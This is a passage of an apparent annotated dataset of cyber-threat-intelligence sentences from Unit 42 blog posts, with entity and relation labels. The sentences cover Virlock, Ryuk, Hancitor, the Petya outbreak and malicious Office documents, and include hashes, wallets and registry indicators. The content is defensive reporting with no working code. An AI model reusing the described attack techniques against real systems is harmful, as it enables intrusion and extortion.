1BFqrLCDwwrxueY7FFDn8DqeoasPJignxt.","entities":[{"id":1837,"label":"SHA2","start_offset":44,"end_offset":108},{"id":46168,"label":"malware","start_offset":17,"end_offset":34},{"id":46169,"label":"SOFTWARE","start_offset":144,"end_offset":151}],"relations":[{"id":157,"from_id":1837,"to_id":46168,"type":"indicates"}],"Comments":[]} {"id":555,"text":"However, this wallet had not really received any ransom payments when the malware was delivered.","entities":[],"relations":[],"Comments":[]} {"id":556,"text":"The wallet got involved in the operation of mixing and tumbling among several other virtual wallets.","entities":[],"relations":[],"Comments":[]} {"id":557,"text":"This is a pretty common operation when attackers want to withdraw or disperse currency from ransom payments into other wallets.","entities":[],"relations":[],"Comments":[]} {"id":558,"text":"During the operation, 25.1 BTC from 538 wallets was sent to 1NDyJtNTjmwk5xPNhjgAMu4HDHigtobu1s (SHA256: CE11703DEF517306326C48A67A7C859A3DE0F18E2451DF226CE171389A5B7953), which is a wallet owned by Binance cryptocurrency exchange.","entities":[{"id":1845,"label":"SHA2","start_offset":104,"end_offset":168},{"id":44776,"label":"identity","start_offset":198,"end_offset":229}],"relations":[{"id":164,"from_id":44776,"to_id":1845,"type":"owns"}],"Comments":[]} {"id":559,"text":"(ref: Binance on Twitter ).","entities":[{"id":46171,"label":"SOFTWARE","start_offset":6,"end_offset":13},{"id":46172,"label":"SOFTWARE","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} {"id":560,"text":"The 25.1 BTC amount was worth $1.18 million at that time, and now is about $876,000.","entities":[],"relations":[],"Comments":[]} {"id":561,"text":" Since Virlock only requests a $250 ransom, it does not draw too much public attention.","entities":[{"id":45795,"label":"malware","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} {"id":562,"text":"Other ransomware families, however, target enterprises and ask for multimillion dollar ransoms, which garners much more media attention.","entities":[],"relations":[],"Comments":[]} {"id":563,"text":"Based on the way Virlock spreads the ransom amount it demands, it is likely designed to target consumers or home users.","entities":[{"id":46173,"label":"malware","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} {"id":564,"text":"After infection, Virlock hides the file extension through modification of the registry (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt = 1, HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden = 2).","entities":[{"id":1874,"label":"REGISTRYKEY","start_offset":88,"end_offset":164},{"id":1876,"label":"REGISTRYKEY","start_offset":170,"end_offset":241},{"id":44778,"label":"malware","start_offset":17,"end_offset":24}],"relations":[{"id":165,"from_id":1874,"to_id":44778,"type":"indicates"},{"id":166,"from_id":1876,"to_id":44778,"type":"indicates"}],"Comments":[]} {"id":565,"text":"The encrypted file icon will look the same as usual, but after opening the infected file, the ransom note will pop up.","entities":[],"relations":[],"Comments":[]} {"id":566,"text":"Virlock uses, but isn’t limited to, PDF, DOC, PPT, JPG, BMP,GIF, RAR, 7Zip, Zip and EXE files.","entities":[{"id":46174,"label":"malware","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":567,"text":"Figure 6 is a screenshot of a recently captured Virlock ransom note.","entities":[{"id":44781,"label":"malware","start_offset":48,"end_offset":55}],"relations":[],"Comments":[]} {"id":568,"text":"The attacker asked for $250 and required payment as 0.004 BTC (suggesting that at the time the ransom note was written, 1 BTC equaled approximately $62,500).","entities":[],"relations":[],"Comments":[]} {"id":569,"text":"At the time of infection experiments, 1 BTC equaled approximately $54,649, suggesting that the exchange rate in the ransom note is not updated on the fly.","entities":[],"relations":[],"Comments":[]} {"id":570,"text":"Some Virlock variants ask for more ransom, such as 0.771 BTC, 1.008 BTC or more.","entities":[{"id":44782,"label":"malware","start_offset":5,"end_offset":12}],"relations":[],"Comments":[]} {"id":571,"text":" The top three samples we observed spreading in early 2021 were Ryuk, Maze, and Sodinokibi.","entities":[{"id":1907,"label":"malware","start_offset":64,"end_offset":68},{"id":1910,"label":"malware","start_offset":80,"end_offset":90},{"id":46175,"label":"malware","start_offset":70,"end_offset":74},{"id":46176,"label":"TIME","start_offset":54,"end_offset":58}],"relations":[],"Comments":[]} {"id":572,"text":"These three contribute 7.2% out of the total infected numbers we collected.","entities":[],"relations":[],"Comments":[]} {"id":573,"text":" Ryuk will change the infected file extension to .RYK, and leave a ransom note called RyukReadMe.html.","entities":[{"id":44783,"label":"malware","start_offset":1,"end_offset":5},{"id":44784,"label":"FILEPATH","start_offset":86,"end_offset":101}],"relations":[{"id":22,"from_id":44784,"to_id":44783,"type":"indicates"}],"Comments":[]} {"id":574,"text":"One of the reasons Ryuk causes so much damage is because it will scan the local network and try to infect other machines through Server Message Block (SMB) protocols.","entities":[{"id":1919,"label":"malware","start_offset":19,"end_offset":23},{"id":46177,"label":"SOFTWARE","start_offset":129,"end_offset":155}],"relations":[],"Comments":[]} {"id":575,"text":"Ryuk will even send out Wake-on-LAN packets to wake up systems that have been configured with this feature.","entities":[{"id":1923,"label":"malware","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} {"id":576,"text":"In this research, we discussed ransomware family trends we observed in the first three months of 2021.","entities":[{"id":44785,"label":"TIME","start_offset":97,"end_offset":101}],"relations":[],"Comments":[]} {"id":577,"text":"First, we reviewed the trends from prevalent ransomware families, then we discussed the most common file types used as attack vectors leveraged by ransomware.","entities":[],"relations":[],"Comments":[]} {"id":578,"text":"Lastly, we gave an example of ransom operations and updates about top ransomware families.","entities":[],"relations":[],"Comments":[]} {"id":579,"text":" Ransomware threats are a serious challenge.","entities":[],"relations":[],"Comments":[]} {"id":580,"text":"Employing effective backup strategies and disaster recovery procedures is important.","entities":[],"relations":[],"Comments":[]} {"id":581,"text":"Palo Alto Networks customers are further protected from ransomware.","entities":[{"id":46178,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":582,"text":"Cortex XSOAR can automatically and instantly coordinate with network security, malware analysis and threat management solutions to ensure customers remain protected.","entities":[{"id":44786,"label":"SOFTWARE","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} {"id":583,"text":"Cortex XDR endpoint protection stops malware, exploits and ransomware before they can compromise endpoints.","entities":[{"id":46179,"label":"SOFTWARE","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":584,"text":"With AI-powered Inline analysis, the Next-Generation Firewall stops exploits that lead to infection, and WildFire’s always up-to-date machine learning models monitor behavior to preemptively detect unknown ransomware.","entities":[{"id":46180,"label":"identity","start_offset":105,"end_offset":113}],"relations":[],"Comments":[]} {"id":585,"text":" If you think you may have been impacted by ransomware, please email unit42-investigations@paloaltonetworks.com or call (866) 4-UNIT42 to get in touch with the Unit 42 Incident Response team.","entities":[{"id":1952,"label":"EMAIL","start_offset":69,"end_offset":111},{"id":1954,"label":"identity","start_offset":160,"end_offset":167},{"id":44787,"label":"identity","start_offset":128,"end_offset":134},{"id":44788,"label":"identity","start_offset":160,"end_offset":190}],"relations":[],"Comments":[]} {"id":586,"text":" Highlights from the 2021 Unit 42 Ransomware Threat Report Ransomware Threat Assessments: A Companion to the 2021 Unit 42 Ransomware Threat Report Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":1956,"label":"identity","start_offset":26,"end_offset":33},{"id":1958,"label":"identity","start_offset":115,"end_offset":122}],"relations":[],"Comments":[]} {"id":587,"text":"Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":588,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":589,"text":"If you need to understand one thing about cybercrime, it’s that it is all about business.","entities":[],"relations":[],"Comments":[]} {"id":590,"text":" In our latest Unit 42 research on cybercriminals using the Hancitor malware, we show that not only are their attacks about business, we can see these cybercriminals deftly applying some fundamental business principles around timing, specialization, and globalization.","entities":[{"id":46181,"label":"identity","start_offset":15,"end_offset":22},{"id":46182,"label":"malware","start_offset":60,"end_offset":68}],"relations":[],"Comments":[]} {"id":591,"text":" Hancitor is a malware that focuses getting other malware onto the victim’s system.","entities":[{"id":44790,"label":"malware","start_offset":1,"end_offset":9}],"relations":[],"Comments":[]} {"id":592,"text":"In the case of Hancitor, it’s typically banking Trojans that steal the victim’s banking information.","entities":[{"id":46183,"label":"malware","start_offset":15,"end_offset":23},{"id":46184,"label":"attack-pattern","start_offset":61,"end_offset":99}],"relations":[],"Comments":[]} {"id":593,"text":" In our latest research, we can see the attackers behind Hancitor have been timing their attacks to happen during the busiest time of the global working week, the middle of the week.","entities":[{"id":46185,"label":"malware","start_offset":57,"end_offset":65}],"relations":[],"Comments":[]} {"id":594,"text":"And we’ve seen that in adapting their attacks to better evade detection, they’ve specialized their operations around the globe.","entities":[],"relations":[],"Comments":[]} {"id":595,"text":" Hancitor isn’t particularly advanced in its tactics: it’s ideal target is an old or outdated version of Microsoft Windows like Windows 7 or even Windows XP.","entities":[{"id":46187,"label":"malware","start_offset":1,"end_offset":9},{"id":46188,"label":"SOFTWARE","start_offset":105,"end_offset":122},{"id":46189,"label":"SOFTWARE","start_offset":128,"end_offset":137},{"id":46190,"label":"SOFTWARE","start_offset":146,"end_offset":157}],"relations":[],"Comments":[]} {"id":596,"text":"But it’s effective enough that when used in several hundred different spam campaigns every month it pays for the criminals to keep up these attacks against targets around the world.","entities":[],"relations":[],"Comments":[]} {"id":597,"text":" Timing In our most recent research, one of the things that jumped out for our researchers is the clear pattern around the timing of the attacks.","entities":[],"relations":[],"Comments":[]} {"id":598,"text":"As you can see in Figure 1 below, throughout 2017, the Hancitor attacks show clear spikes in their occurrence and these spikes happen during the middle of the week.","entities":[{"id":46192,"label":"TIME","start_offset":45,"end_offset":49},{"id":46191,"label":"SOFTWARE","start_offset":55,"end_offset":63}],"relations":[],"Comments":[]} {"id":599,"text":" Figure 1: Timeline of Hancitor campaign activity since January 2017.","entities":[{"id":46193,"label":"malware","start_offset":23,"end_offset":31},{"id":46194,"label":"TIME","start_offset":56,"end_offset":68}],"relations":[],"Comments":[]} {"id":600,"text":" The attackers behind Hancitor aren’t the first to time their spam attacks like this, but it is an effective tactic to try and increase their chances of success, especially when combined with the other innovation that we’ve seen.","entities":[{"id":44791,"label":"malware","start_offset":22,"end_offset":30},{"id":44792,"label":"attack-pattern","start_offset":62,"end_offset":74}],"relations":[{"id":23,"from_id":44791,"to_id":44792,"type":"uses"}],"Comments":[]} {"id":601,"text":"Adapting the Attacks ","entities":[],"relations":[],"Comments":[]} {"id":602,"text":"In the past, Hancitor was sent as a malicious attachment in a spam email which would then download and install the attackers’ final malware like a banking Trojan.","entities":[{"id":46195,"label":"malware","start_offset":13,"end_offset":21},{"id":46196,"label":"attack-pattern","start_offset":36,"end_offset":72}],"relations":[{"id":167,"from_id":46195,"to_id":46196,"type":"uses"}],"Comments":[]} {"id":603,"text":"When they would do this, the Hancitor attachment would download and install the final malware from a malicious or compromised site.","entities":[{"id":44793,"label":"malware","start_offset":29,"end_offset":37}],"relations":[],"Comments":[]} {"id":604,"text":" But as organizations have gotten more effective at blocking malicious attachments like Hancitor, we’ve seen the attackers behind Hancitor adapt to evade detection and prevention.","entities":[{"id":46198,"label":"malware","start_offset":130,"end_offset":138},{"id":46200,"label":"malware","start_offset":88,"end_offset":96}],"relations":[],"Comments":[]} {"id":605,"text":" They’ve done this by moving the Hancitor malware from being a malicious attachment in spam to itself being a malicious download.","entities":[{"id":46201,"label":"malware","start_offset":33,"end_offset":41}],"relations":[],"Comments":[]} {"id":606,"text":"The spam the attackers use no long has a malicious attachment but instead a malicious link that downloads the malicious Hancitor attachment.","entities":[{"id":44794,"label":"malware","start_offset":120,"end_offset":128},{"id":44795,"label":"attack-pattern","start_offset":76,"end_offset":91},{"id":44796,"label":"attack-pattern","start_offset":41,"end_offset":61}],"relations":[{"id":24,"from_id":44796,"to_id":44794,"type":"delivers"},{"id":25,"from_id":44795,"to_id":44794,"type":"delivers"}],"Comments":[]} {"id":607,"text":" To do this, they make the spam look like something that requires you to click and download something like and invoice, a message, or a delivery notification.","entities":[],"relations":[],"Comments":[]} {"id":608,"text":"Figure 2 shows one of these that was made to look like an Amazon shipping notice.","entities":[{"id":46202,"label":"identity","start_offset":58,"end_offset":64}],"relations":[],"Comments":[]} {"id":609,"text":"Figure 2: Hancitor malspam example from February 2017.","entities":[{"id":44797,"label":"malware","start_offset":10,"end_offset":18},{"id":44798,"label":"TIME","start_offset":40,"end_offset":53}],"relations":[],"Comments":[]} {"id":610,"text":" This means that a Hancitor attack now has two downloads rather than one and what these attackers did around the malicious downloads shows another modern business tactic: globalization.","entities":[{"id":46203,"label":"malware","start_offset":19,"end_offset":27}],"relations":[],"Comments":[]} {"id":611,"text":" Globalizing the Attacks Figure 3 below is a map showing where our Unit 42 researchers have found webistes involved in Hancitor attacks.","entities":[{"id":46204,"label":"malware","start_offset":120,"end_offset":128},{"id":46205,"label":"identity","start_offset":68,"end_offset":87}],"relations":[],"Comments":[]} {"id":612,"text":" Figure 3: Hancitor distribution servers globally thus far in 2017 Table 1 – Number of Distribution Servers by Country ","entities":[{"id":44799,"label":"malware","start_offset":11,"end_offset":19},{"id":44800,"label":"TIME","start_offset":62,"end_offset":66}],"relations":[],"Comments":[]} {"id":613,"text":"The hot spots in the United States represents distribution servers which are created using fraud based accounts at various hosting providers that are hosting the Hancitor documents while the hotspots in Asia represent legitimate sites for small and medium businesses that have been compromised by the actors behind Hancitor campaign to host the malicious Hancitor documents.","entities":[{"id":46207,"label":"malware","start_offset":162,"end_offset":170},{"id":46208,"label":"location","start_offset":203,"end_offset":207},{"id":46206,"label":"location","start_offset":21,"end_offset":34},{"id":46210,"label":"campaign","start_offset":315,"end_offset":332},{"id":46211,"label":"malware","start_offset":355,"end_offset":363}],"relations":[{"id":168,"from_id":46207,"to_id":46206,"type":"targets"},{"id":169,"from_id":46207,"to_id":46208,"type":"targets"}],"Comments":[]} {"id":614,"text":" Conclusion Attackers are always making business decisions to optimize their attacks in ways that are most successful and profitable.","entities":[],"relations":[],"Comments":[]} {"id":615,"text":"What is most interesting about Hancitor is the way these decisions so clearly reflect an awareness of business realities (by targeting peak working times) and dividing up the “work” of their attacks in a way that so clearly mirrors mainstream business decisions around globalizing operations.","entities":[{"id":45796,"label":"malware","start_offset":31,"end_offset":39}],"relations":[],"Comments":[]} {"id":616,"text":" In the end, while Hancitor may not be sophisticated, these steps to adapt and stay effective seem to be succeeding.","entities":[{"id":46212,"label":"malware","start_offset":19,"end_offset":27}],"relations":[],"Comments":[]} {"id":617,"text":"And we expect to continue to see Hancitor be a global threat for the foreseeable future.","entities":[{"id":46213,"label":"malware","start_offset":33,"end_offset":41}],"relations":[],"Comments":[]} {"id":618,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":619,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":620,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":621,"text":"This post is also available in: 日本語 (Japanese) This Unit 42 blog provides an update on the threat situation surrounding attacks using the Petya Ransomware which are impacting organizations in Ukraine, Russia and to a lesser extent around the world.","entities":[{"id":2073,"label":"identity","start_offset":58,"end_offset":65},{"id":2074,"label":"malware","start_offset":144,"end_offset":149},{"id":44803,"label":"malware","start_offset":144,"end_offset":160},{"id":44804,"label":"location","start_offset":198,"end_offset":205},{"id":44805,"label":"location","start_offset":207,"end_offset":213}],"relations":[{"id":27,"from_id":44803,"to_id":44805,"type":"targets"},{"id":26,"from_id":44803,"to_id":44804,"type":"targets"}],"Comments":[]} {"id":622,"text":" On June 27th, 2017 we became aware of a new variant of the Petya malware which is spreading through multiple lateral movement techniques.","entities":[{"id":2081,"label":"malware","start_offset":60,"end_offset":65},{"id":46214,"label":"TIME","start_offset":4,"end_offset":19}],"relations":[],"Comments":[]} {"id":623,"text":"One technique includes the ETERNALBLUE exploit tool.","entities":[{"id":2083,"label":"malware","start_offset":28,"end_offset":39}],"relations":[],"Comments":[]} {"id":624,"text":"This is the same exploit the WanaCrypt0r\/WannaCry malware exploited to spread globally in May, 2017.","entities":[{"id":2086,"label":"malware","start_offset":29,"end_offset":40},{"id":2087,"label":"malware","start_offset":41,"end_offset":49},{"id":44808,"label":"TIME","start_offset":90,"end_offset":99}],"relations":[],"Comments":[]} {"id":625,"text":"At least 50 organizations have reported impacts from the malware, including government and critical infrastructure operators.","entities":[],"relations":[],"Comments":[]} {"id":627,"text":" Palo Alto Networks is documenting our prevention capabilities with regard to this threat in the Palo Alto Networks Protections for Petya Ransomware blog post.","entities":[{"id":44809,"label":"identity","start_offset":1,"end_offset":19},{"id":44810,"label":"identity","start_offset":97,"end_offset":115},{"id":44811,"label":"malware","start_offset":132,"end_offset":148}],"relations":[],"Comments":[]} {"id":628,"text":"Windows users should take the following general steps to protect themselves:","entities":[{"id":46217,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":629,"text":" This is a developing situation, we will update this blog as new information becomes available.","entities":[],"relations":[],"Comments":[]} {"id":630,"text":"AutoFocus users view samples using the Petya tag.","entities":[{"id":2102,"label":"malware","start_offset":39,"end_offset":44}],"relations":[],"Comments":[]} {"id":631,"text":" Petya is a ransomware family that works by modifying the Window’s system’s Master Boot Record (MBR), causing the system to crash.","entities":[{"id":2103,"label":"malware","start_offset":1,"end_offset":6},{"id":46218,"label":"SOFTWARE","start_offset":58,"end_offset":100}],"relations":[],"Comments":[]} {"id":632,"text":"When the user reboots their PC, the modified MBR prevents Windows from loading and displays a fake “chkdisk” screen which indicates the computer's hard drive is being repaired, but the malware is actually encrypting the user's files.","entities":[{"id":46220,"label":"SOFTWARE","start_offset":58,"end_offset":65},{"id":46219,"label":"SOFTWARE","start_offset":45,"end_offset":48}],"relations":[],"Comments":[]} {"id":633,"text":" When this process completes, the malware displays an ASCII Ransom note demanding payment from the victim (Figure 1). Figure 1: Latest Petya Ransom note displayed on a compromised system.","entities":[{"id":2109,"label":"malware","start_offset":136,"end_offset":141}],"relations":[],"Comments":[]} {"id":634,"text":" The latest version of the Petya ransomware is spreading over Windows SMB and is reportedly using the ETERNALBLUE exploit tool, which exploits CVE-2017-0144 and was originally released by the Shadow Brokers group in April 2017.","entities":[{"id":2111,"label":"malware","start_offset":27,"end_offset":32},{"id":2113,"label":"malware","start_offset":102,"end_offset":113},{"id":2116,"label":"threat-actor","start_offset":188,"end_offset":206},{"id":46221,"label":"SOFTWARE","start_offset":62,"end_offset":73},{"id":46222,"label":"vulnerability","start_offset":143,"end_offset":156},{"id":46223,"label":"TIME","start_offset":216,"end_offset":226}],"relations":[{"id":171,"from_id":2111,"to_id":46222,"type":"exploits"},{"id":170,"from_id":2111,"to_id":46221,"type":"targets"},{"id":172,"from_id":2116,"to_id":2113,"type":"authored-by"},{"id":173,"from_id":46222,"to_id":46221,"type":"targets"}],"Comments":[]} {"id":635,"text":" After the system is compromised the victim is asked to send US $300 in Bitcoin to a specific Bitcoin address and then send an e-mail with the victim’s bitcoin wallet ID to wowsmith123456@posteo[.]net to retrieve their individual decryption key.","entities":[{"id":46226,"label":"SOFTWARE","start_offset":94,"end_offset":101},{"id":46224,"label":"EMAIL","start_offset":173,"end_offset":200},{"id":46225,"label":"SOFTWARE","start_offset":72,"end_offset":79}],"relations":[],"Comments":[]} {"id":636,"text":" Posteo (a free e-mail provider) has already shut down this e-mail address, and as such victims should not even attempt to pay the ransom.","entities":[{"id":44816,"label":"SOFTWARE","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} {"id":637,"text":"As of 13:00 UTC on June 28thth, approximately 4 Bitcoin have been transferred to the attacker's wallet.","entities":[{"id":46227,"label":"TIME","start_offset":6,"end_offset":28}],"relations":[],"Comments":[]} {"id":638,"text":" Unit 42 is unaware of ANY successful recovery after paying the ransom.","entities":[{"id":2124,"label":"identity","start_offset":1,"end_offset":8},{"id":2125,"label":"location","start_offset":64,"end_offset":70}],"relations":[],"Comments":[]} {"id":639,"text":"Additionally, ongoing research by the industry is showing that specific actions this malware takes makes it technically infeasible, if not impossible, for recovery to occur.","entities":[],"relations":[],"Comments":[]} {"id":640,"text":" This means that even though this malware is functionally ransomware, for threat assessment purposes, it should be functionally considered a “wiper”.","entities":[],"relations":[],"Comments":[]} {"id":641,"text":" We are aware of the following information about how the Petya attack lifecycle works.","entities":[{"id":46228,"label":"malware","start_offset":57,"end_offset":62}],"relations":[],"Comments":[]} {"id":642,"text":" Delivery\/Exploitation","entities":[],"relations":[],"Comments":[]} {"id":643,"text":" We have not yet confirmed the initial infection vector for this new Petya variant.","entities":[{"id":2132,"label":"malware","start_offset":69,"end_offset":74}],"relations":[],"Comments":[]} {"id":644,"text":"Previous variants were spread through e-mail, but we have not identified this latest sample carried in any e-mail related attacks.","entities":[],"relations":[],"Comments":[]} {"id":645,"text":" While we have not been able to directly confirm the source, we have seen evidence that a Ukrainian software application called MEDoc was used by attackers to deliver the Petya DLL.","entities":[{"id":46229,"label":"location","start_offset":90,"end_offset":99},{"id":44817,"label":"SOFTWARE","start_offset":128,"end_offset":133},{"id":44818,"label":"malware","start_offset":171,"end_offset":176}],"relations":[{"id":174,"from_id":44818,"to_id":44817,"type":"uses"}],"Comments":[]} {"id":646,"text":"The software is heavily used in Ukraine it appears the company’s systems may have been compromised and used to issue a malicious update to systems running the program on the morning of Jun 27th.","entities":[{"id":46230,"label":"TIME","start_offset":174,"end_offset":193},{"id":46231,"label":"location","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} {"id":648,"text":" Installation ","entities":[],"relations":[],"Comments":[]} {"id":649,"text":"This variant of Petya is spread as a DLL file, which must be executed by another process before it takes action on the system.","entities":[{"id":2145,"label":"malware","start_offset":16,"end_offset":21}],"relations":[],"Comments":[]} {"id":650,"text":"Once executed, it overwrites the Master Boot Record and creates a scheduled task to reboot the system.","entities":[{"id":46233,"label":"SOFTWARE","start_offset":33,"end_offset":51},{"id":46234,"label":"attack-pattern","start_offset":66,"end_offset":80}],"relations":[],"Comments":[]} {"id":651,"text":"Once the system reboots, the malware displays a fake “chkdisk” scan which tricks the victim into believing the program is repairing their hard drive.","entities":[],"relations":[],"Comments":[]} {"id":652,"text":"In reality, the malware is encrypting the NTFS Master File Table in the background.","entities":[],"relations":[],"Comments":[]} {"id":653,"text":"Once the fake chkdisk completes, the malware displays a ransom note which demands a payment of $300 in bitcoin.","entities":[],"relations":[],"Comments":[]} {"id":654,"text":"Command and Control Petya contains no Command and Control mechanisms that we know of.","entities":[{"id":2153,"label":"malware","start_offset":21,"end_offset":26}],"relations":[],"Comments":[]} {"id":655,"text":"After a host is infected, there is no communication from the malware back to the attacker.","entities":[],"relations":[],"Comments":[]} {"id":656,"text":" Lateral Movement Petya uses three mechanisms to spread to additional hosts.","entities":[{"id":2156,"label":"malware","start_offset":19,"end_offset":24},{"id":46235,"label":"attack-pattern","start_offset":1,"end_offset":17}],"relations":[],"Comments":[]} {"id":657,"text":" Ransomware attacks are very common, but they are rarely coupled with an exploit that allows the malware to spread as a network worm.","entities":[],"relations":[],"Comments":[]} {"id":658,"text":"The WannaCry attacks in May, 2017 demonstrated that many Windows systems had not been patched for this vulnerability.","entities":[{"id":2160,"label":"malware","start_offset":4,"end_offset":12},{"id":46236,"label":"TIME","start_offset":24,"end_offset":33},{"id":46237,"label":"SOFTWARE","start_offset":57,"end_offset":64}],"relations":[],"Comments":[]} {"id":659,"text":"The spread of Petya using this vulnerability indicates that many organizations may still be vulnerable, despite the attention WannaCry received.","entities":[{"id":2163,"label":"malware","start_offset":14,"end_offset":19},{"id":2166,"label":"malware","start_offset":126,"end_offset":134}],"relations":[],"Comments":[]} {"id":660,"text":" As always if you have any questions, please come to the Threat & Vulnerability Discussions on our Live Community. Version Summary June 27, 2017: June 27, 2017 – 1:08 PM PT June 28, 2017 – 8:40 AM PT June 29, 2017 - 5:00 PM PT Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46238,"label":"TIME","start_offset":133,"end_offset":146},{"id":46241,"label":"TIME","start_offset":177,"end_offset":203},{"id":46242,"label":"TIME","start_offset":205,"end_offset":231},{"id":46240,"label":"TIME","start_offset":149,"end_offset":175}],"relations":[],"Comments":[]} {"id":661,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":662,"text":"Nearly all of us have a use for Microsoft Office documents.","entities":[{"id":46243,"label":"SOFTWARE","start_offset":32,"end_offset":48}],"relations":[],"Comments":[]} {"id":663,"text":"Whether they are work documents, e-receipts, or a lease on a new apartment – Office documents are useful to all of us, and this is part of the reason we’re very likely to open an office document we receive as an attachment in e-mail.","entities":[],"relations":[],"Comments":[]} {"id":664,"text":"Armed with the knowledge that many people will open nearly any document, even those from an untrusted source, adversaries commonly choose these files in attacks to compromise a system.","entities":[],"relations":[],"Comments":[]} {"id":665,"text":"In this threat brief we show you five different ways that Office documents can be subverted and abused to attack and compromise a Windows endpoint, some we’ve already posted about before, and some are new.","entities":[{"id":46244,"label":"SOFTWARE","start_offset":130,"end_offset":137}],"relations":[],"Comments":[]} {"id":666,"text":" Macros Macros are the most straight-forward way for an attacker to weaponize Office documents.","entities":[],"relations":[],"Comments":[]} {"id":667,"text":"Office applications have a built-in script engine that can run VBA (Visual Basic for Applications) scripts.","entities":[{"id":46245,"label":"SOFTWARE","start_offset":63,"end_offset":98}],"relations":[],"Comments":[]} {"id":668,"text":"These scripts can execute immediately as the document opens, without any user interaction (assuming the user has previously enabled macros) and run malicious code on the system.","entities":[],"relations":[],"Comments":[]} {"id":669,"text":"If the user has not enabled macros, a popup window will appear asking the user to click to do so.","entities":[],"relations":[],"Comments":[]} {"id":670,"text":"The pop-up is one of several security mechanisms added by Microsoft to mitigate the security risk that macros pose.","entities":[{"id":46246,"label":"identity","start_offset":58,"end_offset":67}],"relations":[],"Comments":[]} {"id":671,"text":"Microsoft will also force a different file extension (.docm instead of .docx for new documents containing macros).","entities":[{"id":46247,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":672,"text":"Despite these measures, users still choose to open these files and enable their content, thus allowing macros to continue be a common attack vector – both in wide and simple attacks to deliver ransomware such as Emotet, as well as for sophisticated attacks like this Sofacy campaign.","entities":[{"id":2220,"label":"malware","start_offset":212,"end_offset":218},{"id":44819,"label":"campaign","start_offset":267,"end_offset":282},{"id":44821,"label":"threat-actor","start_offset":267,"end_offset":273}],"relations":[{"id":175,"from_id":44819,"to_id":44821,"type":"related-to"}],"Comments":[]} {"id":673,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":674,"text":"The Sofacy document before & after the content is enabled","entities":[{"id":46248,"label":"malware","start_offset":4,"end_offset":10}],"relations":[],"Comments":[]} {"id":675,"text":" As you can see in this example, attackers try to convince users to disable the security mechanisms added by Microsoft using social engineering, convincing the user to enable content for them to be able to see the full document.","entities":[{"id":45797,"label":"attack-pattern","start_offset":125,"end_offset":143},{"id":44822,"label":"identity","start_offset":109,"end_offset":118}],"relations":[],"Comments":[]} {"id":676,"text":"In the Sofacy example, the attackers had simply made the font color white, so the text was present prior to the user enabling macros, just not clearly visible.","entities":[{"id":46249,"label":"malware","start_offset":7,"end_offset":13}],"relations":[],"Comments":[]} {"id":677,"text":" Embedded Flash files In addition to built-in capabilities, like macros, Office documents can also be embedded with external objects, such as Adobe Flash files.","entities":[{"id":2236,"label":"location","start_offset":91,"end_offset":94},{"id":46250,"label":"SOFTWARE","start_offset":143,"end_offset":154}],"relations":[],"Comments":[]} {"id":678,"text":"These objects are passed to the appropriate software for handling, thus any vulnerability that the software has can also be exploited by embedding it within the Adobe Flash content in the Office document.","entities":[{"id":44823,"label":"SOFTWARE","start_offset":161,"end_offset":172}],"relations":[],"Comments":[]} {"id":679,"text":"An example for such attack vector being leveraged by attackers is CVE-2018-4878, an Adobe Flash Player Zero-Day exploited by embedding malicious SWF files in Excel documents.","entities":[{"id":46251,"label":"vulnerability","start_offset":66,"end_offset":79},{"id":46252,"label":"SOFTWARE","start_offset":84,"end_offset":102},{"id":46253,"label":"attack-pattern","start_offset":125,"end_offset":173}],"relations":[{"id":176,"from_id":46252,"to_id":46251,"type":"has"},{"id":177,"from_id":46251,"to_id":46253,"type":"uses"}],"Comments":[]} {"id":680,"text":"In these types of attacks, the malicious Excel contains embedded Adobe Flash content which can trigger the Flash vulnerability and execute embedded shellcode.","entities":[{"id":46255,"label":"vulnerability","start_offset":107,"end_offset":126},{"id":46254,"label":"SOFTWARE","start_offset":65,"end_offset":76}],"relations":[],"Comments":[]} {"id":681,"text":" Microsoft Equation Editor","entities":[{"id":45798,"label":"SOFTWARE","start_offset":1,"end_offset":26}],"relations":[],"Comments":[]} {"id":682,"text":"In a similar way to embedding Adobe Flash files into an Office document, you can also embed equations in documents that will be parsed by Microsoft Equation Editor - a program that lets you easily write mathematical equations: Figure 2. Microsoft Equation Editor As in our previous example, vulnerabilities in the equation editor can be exploited by leveraging malicious Office documents.","entities":[{"id":46257,"label":"SOFTWARE","start_offset":30,"end_offset":41},{"id":46258,"label":"SOFTWARE","start_offset":138,"end_offset":163},{"id":46256,"label":"SOFTWARE","start_offset":238,"end_offset":263}],"relations":[],"Comments":[]} {"id":683,"text":"We’ve seen examples of this just recently, when CVE-2017-11882 was exploited in the wild, paving the way to other exploits like CVE-2018-0802, both of which exploit flaws in the equation editor, enabling attackers to get from the user opening an Office document to remote code 